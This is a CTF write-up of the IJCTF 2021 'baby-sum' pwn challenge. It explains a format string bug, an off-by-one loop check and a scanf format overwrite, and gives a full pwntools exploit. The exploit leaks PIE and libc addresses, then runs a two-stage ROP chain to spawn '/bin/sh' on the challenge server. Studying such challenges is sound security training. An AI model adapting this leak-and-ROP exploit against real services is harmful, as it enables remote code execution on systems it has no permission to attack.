###### tags: `ctf pwn` `IJCTF 2021` `format string`
# IJCTF2021 baby-sum
**Baby-sum** is a pwn challenge from IJCTF 2021.
The challenge was authored by **@whoamiT** and solved by **@thonk**.
## Sample running of binary

Take note of the **red** underline. The binary first takes a name as input, followed by 3 numbers.
## Vulnerability
There are 3 main vulnerabilities:
1) The first vulnerability is fairly obvious: there is a **format string** vulnerability.
2) The binary only intends to scan for a number **3 times**, but it uses the wrong comparison at `calc+0x7A`: `JG` is used instead of `JGE`.
3) In the **third** scanf, the binary overwrites the **format** argument, which is then used for the **fourth** scanf. This lets the attacker supply a format with a very large (or no) width limit for the fourth scanf, causing a stack overflow.
The vulnerability block in IDA Pro is below:

## Exploitation
Looking at the sample binary output above, the program mentions that it only supports the input of **3 numbers**. In addition, we can see that the program indeed **ends** after 3 numbers.
### So how did the **fourth** scanf happen?
Referring to the IDA block above, at `calc+0x75` there is a **comparison with 2**. The counter starts from **0**, so in the **third iteration** it has a value of **2**. On the next line, the program does not take the intended jump out of the loop, because the jump is taken only when the counter is **greater than 2**. It therefore goes on to a fourth scanf.
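The off-by-one can be reproduced with a small simulation. This is a minimal sketch, not the decompiled code: the name `count_scanf_calls` is hypothetical, and the loop shape (scanf, then compare the counter with 2, then increment) is an assumption chosen to match the description above.

```python
def count_scanf_calls(should_exit):
    """Count how many times the loop body (one scanf call) runs.

    Assumed loop shape: scanf, compare the counter with 2, then increment.
    """
    counter = 0
    calls = 0
    while True:
        calls += 1                # one scanf call per iteration
        if should_exit(counter):  # the conditional jump out of the loop
            break
        counter += 1
    return calls

# JG: leave the loop only when counter > 2 (what the binary does)
calls_with_jg = count_scanf_calls(lambda c: c > 2)
# JGE: leave the loop when counter >= 2 (the presumably intended check)
calls_with_jge = count_scanf_calls(lambda c: c >= 2)

print(calls_with_jg, calls_with_jge)  # 4 3
```

Under these assumptions, the `JG` variant runs the body one extra time, which is the fourth scanf.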
However, the fourth scanf appears not to happen in a normal execution because it is not given a proper **format argument**. The program does call scanf a fourth time, but after seeing the wrong format, scanf does not go on to take user input. Hence, with an **invalid** format, the fourth scanf is effectively never triggered. A proper format, for example `%10s`, is required.
## GDB output for scanf
Note that the **destination address (rsi)** of the 3rd scanf is the same address that is used as the **format argument (rdi)** of the 4th scanf.
```
1st scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rsi = 0x00007fffffffe3d0 → 0x0000000000000000,
$rdx = 0x00007fffffffe3d0 → 0x0000000000000000
)
2nd scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rsi = 0x00007fffffffe3d8 → 0x0000000000000000,
$rdx = 0x00007fffffffe3d8 → 0x0000000000000000
)
3rd scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rsi = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?),
$rdx = 0x00007fffffffe3e0 → 0x0000000000733825 ("%8s"?)
)
4th scanf:
__isoc99_scanf@plt (
$rdi = 0x00007fffffffe3e0 → 0x0000007324333125 ("%13$s"?),
$rsi = 0x00007fffffffe3e8 → 0x00007fffffffe3c7 → 0x005555555552ff00,
$rdx = 0x00007fffffffe3e8 → 0x00007fffffffe3c7 → 0x005555555552ff00
)
```
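The register values in the dump can be checked by hand. The sketch below uses only numbers taken from the GDB output; the 8-byte stride between destinations is inferred from the four `$rsi` values, and the helper name `decode_qword` is hypothetical.

```python
FORMAT_BUF = 0x00007fffffffe3e0   # $rdi in every call
FIRST_DEST = 0x00007fffffffe3d0   # $rsi in the 1st call
STRIDE = 8                        # inferred: ...3d0 -> ...3d8 -> ...3e0 -> ...3e8

def decode_qword(value):
    """Interpret a little-endian 64-bit value as a NUL-terminated string."""
    return value.to_bytes(8, "little").split(b"\x00")[0].decode("ascii")

# Destination of each scanf call (index 0 is the 1st call).
dests = [FIRST_DEST + STRIDE * i for i in range(4)]

# Which call writes directly on top of the format buffer?
overlapping_call = dests.index(FORMAT_BUF) + 1

print(overlapping_call)                    # 3
print(decode_qword(0x0000000000733825))    # %8s
print(decode_qword(0x0000007324333125))    # %13$s
```

The third destination lands exactly on the format buffer, so whatever is typed as the third number becomes the format string of the fourth call.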
To gain RIP control, we need to be able to trigger the **fourth scanf**. To do that, we need to choose a specific offset so that the program does not crash when the **printf format string** is triggered. This explains why the solution uses `%2$s`.
Once the above condition is met, exploitation is straightforward:
1) Leak PIE address
2) Overwrite RIP with ROP gadgets to leak LibC address
3) Stage 1 ROP leaks LibC and ends with a scanf
4) Stage 2 ROP is actual shell payload with the help of LibC leak
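Steps 1 and 3 both turn a leaked pointer into a base address by subtracting a known offset. A minimal sketch of that arithmetic follows; the offsets `0x10e0` and `0x875a0` come from the solution script, while the leaked values and the helper `base_from_leak` are made up for illustration.

```python
PAGE_SIZE = 0x1000

def base_from_leak(leak, offset):
    """Subtract the known offset and sanity-check page alignment."""
    base = leak - offset
    if base % PAGE_SIZE != 0:
        raise ValueError(f"base {base:#x} is not page aligned; wrong offset?")
    return base

# Hypothetical leaks, not real output from the challenge.
pie_leak = 0x5555555550e0
libc_leak = 0x7ffff7e5a5a0

pie_base = base_from_leak(pie_leak, 0x10e0)
libc_base = base_from_leak(libc_leak, 0x875a0)

print(hex(pie_base), hex(libc_base))
```

The alignment check is a cheap way to notice a wrong offset or a mismatched libc version before building a ROP chain on top of a bad base.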
## Solution
The solution below is credited to @thonk.
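```python
from pwn import *

conn = remote('35.244.10.136', 10252)
elf = ELF('./baby-sum')

# The binary prints a stack address before asking for input.
conn.recvuntil(b'generous leak for you: ')
stack_leak = int(conn.recvline().strip(), 0)
print(f'Stack leak: {hex(stack_leak)}')

# Name input: padding with a pointer derived from the stack leak embedded in it.
conn.sendline(b'A'*0x10 + b'B'*0x18 + p64(stack_leak+0x37) + b'A'*0x17)

# Leak a PIE address through the printf format string.
conn.sendlineafter(b'> ', b'%6$p')
conn.recvuntil(b'> ')
pie_leak = int(conn.recvline().strip(), 0)
pie_base = pie_leak - 0x10e0

# Gadget offsets relative to the PIE base.
pop_rdi = 0x00001433
pop_rsi = 0x00001431  # presumably pop rsi; pop r15; ret, given the extra 0x10 word in the chain
print(f'Pie base: {hex(pie_base)}')

# Offset chosen so that the printf format string does not crash (see above).
conn.sendlineafter(b'> ', b'%2$s')

# Stage 1: puts(puts@got) to leak libc, then call scanf again to read stage 2.
rop_chain = [
    pie_base + pop_rdi,
    pie_base + elf.got['puts'],
    pie_base + elf.sym.puts,
    pie_base + pop_rdi,
    stack_leak + 0x98,   # rdi: format pointer (presumably the trailing b'%s')
    pie_base + pop_rsi,
    stack_leak + 0x80,   # rsi: destination for the stage 2 input
    0x10,
    pie_base + 0x00001138,  # ret
    pie_base + elf.sym.__isoc99_scanf
]
conn.sendlineafter(b'> ', b'B'*0x8 + b'C'*0x8 + p64(stack_leak) + b'D'*0x8 + flat(rop_chain, arch='amd64') + b'%s')
conn.recvlines(2)

# Offsets inside the target libc.
binsh = 0x1b75aa
system = 0x55410

# puts prints the address without its two top NUL bytes, so pad to 8 bytes.
libc_leak = u64(conn.recvline().strip() + b'\0\0')
libc_base = libc_leak - 0x875a0
print(f'Libc base: {hex(libc_base)}')

# Stage 2: system("/bin/sh")
rop_chain_2 = [
    b'A'*0x18,
    pie_base + pop_rdi,
    libc_base + binsh,
    pie_base + 0x1138,  # ret
    libc_base + system
]
conn.sendline(flat(rop_chain_2, arch='amd64'))
conn.interactive()
```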
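For readers without pwntools at hand, the packing helpers used above can be approximated with the standard `struct` module. This is a sketch of what `p64`, `u64`, and `flat` do for plain 64-bit little-endian values, not their actual implementation; `pack_chain` is a hypothetical name, and the leaked bytes are invented.

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)

def u64(data):
    """Unpack exactly 8 little-endian bytes into an integer."""
    return struct.unpack("<Q", data)[0]

def pack_chain(items):
    """Concatenate ints as 8-byte words; pass bytes through unchanged."""
    return b"".join(i if isinstance(i, bytes) else p64(i) for i in items)

# puts stops at the first NUL byte, so a userland address arrives as 6 bytes.
leaked = bytes.fromhex("a0a5e5f7ff7f")   # invented example bytes
addr = u64(leaked + b"\0\0")             # pad back to 8 bytes before unpacking

chain = pack_chain([b"A" * 0x18, 0x1433, addr])
print(hex(addr), len(chain))
```

This is why the script appends `b'\0\0'` before calling `u64`: the unpacker needs a full 8 bytes, and the two missing high bytes of the address are zero.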
Solution and my own work can also be found here:
https://github.com/cddc12346/RandomCTFs/tree/master/IJCTF%202021/baby-sum
## Lessons learned
- Always investigate function arguments.
- I noticed the weird scanf arguments early on but did not investigate further, so it took me a while to catch on.